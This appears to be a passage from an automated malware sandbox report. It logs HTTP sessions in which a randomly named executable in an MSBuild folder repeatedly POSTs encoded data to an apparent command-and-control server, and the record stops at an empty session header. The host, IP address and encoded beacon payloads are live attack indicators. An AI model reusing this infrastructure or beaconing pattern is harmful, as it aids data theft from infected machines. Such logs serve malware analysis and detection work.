                                                                                      Data Raw: 39 38 0d 0a 02 11 2e 5b 32 05 37 50 34 0a 2c 55 2a 04 36 12 3d 21 00 5a 3c 01 36 00 3d 2f 22 5e 2e 29 38 1e 3f 16 20 19 23 11 34 1b 21 31 2f 0b 25 29 20 5c 05 11 24 01 27 31 39 1c 27 29 22 02 26 21 22 07 26 3c 33 40 2b 2b 2e 13 27 17 06 01 23 23 23 0c 26 39 23 5b 33 3f 22 04 2d 00 28 03 25 17 2d 54 02 17 21 0d 30 3e 28 11 29 30 33 5d 25 1c 3d 1a 3e 3e 3f 0c 21 3a 3b 0f 22 55 25 5d 25 06 2e 59 21 1c 09 11 2b 16 3f 1f 33 12 0e 15 27 3e 23 55 22 00 2c 52 0e 3f 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 98.[27P4,U*6=!Z<6=/"^.)8? #4!1/%) \$'19')"&!"&<3@++.'###&9#[3?"-(%-T!0>()03]%=>>?!:;"U%]%.Y!+?3'>#U",R?\W0


                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                      46          192.168.2.4  49789        91.227.16.11    80                4520  C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp                           Bytes transferred  Direction  Data
                                                                                      Mar 6, 2024 09:53:22.356364012 CET  348                OUT        POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:22.699639082 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:22.700398922 CET  2548               OUT        Data Raw: 51 5c 54 5e 5b 5c 55 50 5e 57 5a 51 57 51 50 59 54 51 54 53 56 5c 57 5c 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: Q\T^[\UP^WZQWQPYTQTSV\W\QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X:,!$U!^'%&X;%';')#!?+6/_&7(1<,%Z"!Q*
                                                                                      Mar 6, 2024 09:53:23.073484898 CET  286                IN         HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:22 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                      47          192.168.2.4  49790        91.227.16.11    80                4520  C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp                           Bytes transferred  Direction  Data
                                                                                      Mar 6, 2024 09:53:23.545169115 CET  348                OUT        POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:23.888211012 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:23.888592958 CET  2548               OUT        Data Raw: 54 5f 54 50 5b 56 55 57 5e 57 5a 51 57 5a 50 59 54 57 54 58 56 5e 57 5e 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T_TP[VUW^WZQWZPYTWTXV^W^QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9E/-$3=\$6*\,<6'+3Z1!?8U"<$/2Z:\89%Z"!Q*%
                                                                                      Mar 6, 2024 09:53:24.264260054 CET  286                IN         HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:24 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                      48          192.168.2.4  49791        91.227.16.11    80                4520  C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp                           Bytes transferred  Direction  Data
                                                                                      Mar 6, 2024 09:53:24.745485067 CET  348                OUT        POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:25.090270042 CET  2548               OUT        Data Raw: 54 50 51 5d 5e 59 50 53 5e 57 5a 51 57 5b 50 52 54 56 54 5b 56 5b 57 5b 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TPQ]^YPS^WZQW[PRTVT[V[W[QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X:.!&T0#1$P*8<6Y$&0"Z V5?3^37'^%/%Z"!Q*!
                                                                                      Mar 6, 2024 09:53:25.090532064 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:25.471139908 CET  286                IN         HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:25 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                      49          192.168.2.4  49792        91.227.16.11    80                4520  C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp                           Bytes transferred  Direction  Data
                                                                                      Mar 6, 2024 09:53:25.937764883 CET  348                OUT        POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2544
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:26.281550884 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:26.281882048 CET  2544               OUT        Data Raw: 54 59 54 51 5e 59 55 50 5e 57 5a 51 57 59 50 59 54 52 54 53 56 5c 57 5a 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TYTQ^YUP^WZQWYPYTRTSV\WZQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X98W)0#*'5;?08&T!+5(&$/^&9;9%Z"!Q*!
                                                                                      Mar 6, 2024 09:53:26.652324915 CET  286                IN         HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:26 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                      50          192.168.2.4  49794        91.227.16.11    80                4520  C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp                           Bytes transferred  Direction  Data
                                                                                      Mar 6, 2024 09:53:27.248513937 CET  348                OUT        POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 1872
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:27.591542959 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:27.591830969 CET  1872               OUT        Data Raw: 51 5a 54 5d 5e 5c 55 57 5e 57 5a 51 57 5a 50 5f 54 57 54 53 56 58 57 5e 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: QZT]^\UW^WZQWZP_TWTSVXW^QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9;*$!]'!/=$((&);!<4U6? '2?.X,9%Z"!Q*%
                                                                                      Mar 6, 2024 09:53:27.962852955 CET  435                IN         HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:27 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 39 38 0d 0a 02 11 2d 05 26 05 23 50 34 1d 02 16 29 04 25 07 3e 32 2d 07 2b 06 2a 05 2a 11 26 5f 2c 00 20 56 2b 38 20 18 23 06 28 52 36 0f 30 52 25 29 20 5c 05 11 27 59 30 1c 04 00 30 04 2e 04 27 57 2e 03 25 11 3f 45 2b 02 22 10 24 07 27 13 34 33 09 0a 25 2a 3f 13 27 01 2e 01 39 3e 3b 5f 25 2d 2d 54 02 17 22 13 27 5b 27 04 29 33 37 11 32 31 21 15 3d 3e 3f 0c 22 2a 23 0e 22 23 29 59 31 38 3e 16 36 54 20 03 28 5e 3f 1f 25 3c 20 51 31 14 23 55 22 00 2c 52 0e 3f 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 98-&#P4)%>2-+**&_, V+8 #(R60R%) \'Y00.'W.%?E+"$'43%*?'.9>;_%--T"'[')3721!=>?"*#"#)Y18>6T (^?%< Q1#U",R?\W0


                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                      51          192.168.2.4  49795        91.227.16.11    80                4520  C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp                           Bytes transferred  Direction  Data
                                                                                      Mar 6, 2024 09:53:27.367069960 CET  348                OUT        POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:27.707849979 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:27.708204031 CET  2548               OUT        Data Raw: 54 5d 51 5b 5e 5d 55 57 5e 57 5a 51 57 5e 50 5b 54 5d 54 5a 56 5c 57 5a 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T]Q[^]UW^WZQW^P[T]TZV\WZQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9C8-$3058?6]&+<2)?545'Y0$,=/%Z"!Q*
                                                                                      Mar 6, 2024 09:53:28.076261044 CET  286                IN         HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:27 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                      52          192.168.2.4  49796        91.227.16.11    80                4520  C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp                           Bytes transferred  Direction  Data
                                                                                      Mar 6, 2024 09:53:28.549299002 CET  324                OUT        POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Mar 6, 2024 09:53:28.898313046 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:28.898628950 CET  2548               OUT        Data Raw: 54 5d 51 5e 5b 59 55 54 5e 57 5a 51 57 5f 50 52 54 50 54 5f 56 5f 57 58 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T]Q^[YUT^WZQW_PRTPT_V_WXQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X:;!"T3$&X-/&Y&;$1'!;6<7Y&''Y2./%Z"!Q*1
                                                                                      Mar 6, 2024 09:53:29.272958994 CET  286                IN         HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:29 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                      53          192.168.2.4  49797        91.227.16.11    80                4520  C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp                           Bytes transferred  Direction  Data
                                                                                      Mar 6, 2024 09:53:29.745549917 CET  348                OUT        POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:30.088984966 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:30.089473009 CET | 2548 | OUT | Data Raw: 54 51 51 5a 5e 5b 55 51 5e 57 5a 51 57 5b 50 5f 54 54 54 5b 56 54 57 55 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TQQZ^[UQ^WZQW[P_TTT[VTWUQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X:/0#:066^;%&;8&: T!4P5,&4<1,1/%Z"!Q*!
                                                                                      Mar 6, 2024 09:53:30.460036039 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:30 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      54 | 192.168.2.4 | 49798 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:53:30.931688070 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:31.274828911 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:31.275105000 CET | 2548 | OUT | Data Raw: 54 59 54 5f 5b 58 50 57 5e 57 5a 51 57 51 50 59 54 55 54 5b 56 5b 57 55 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TYT_[XPW^WZQWQPYTUT[V[WUQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X:.1-$5^&6Y8='2!,'6,_$B$&&Y89%Z"!Q*
                                                                                      Mar 6, 2024 09:53:31.645950079 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:31 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      55 | 192.168.2.4 | 49799 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:53:32.104346037 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2544
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:32.449577093 CET | 2544 | OUT | Data Raw: 54 51 51 5b 5b 5f 55 53 5e 57 5a 51 57 59 50 5d 54 57 54 52 56 5a 57 54 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TQQ[[_US^WZQWYP]TWTRVZWTQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9D82:V$#&'6;<=$^?Y16<!/#'?%)/9%Z"!Q*1
                                                                                      Mar 6, 2024 09:53:32.457506895 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:32.820734024 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:32 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      56 | 192.168.2.4 | 49800 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:53:33.291979074 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:33.636048079 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:33.636344910 CET | 2548 | OUT | Data Raw: 54 51 54 5b 5b 58 50 53 5e 57 5a 51 57 5a 50 5f 54 55 54 53 56 5d 57 54 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TQT[[XPS^WZQWZP_TUTSV]WTQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9;-%3!^&5"/"Y$ '98Q6/7#//]$$_2<9-9%Z"!Q*%
                                                                                      Mar 6, 2024 09:53:34.008846045 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:33 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
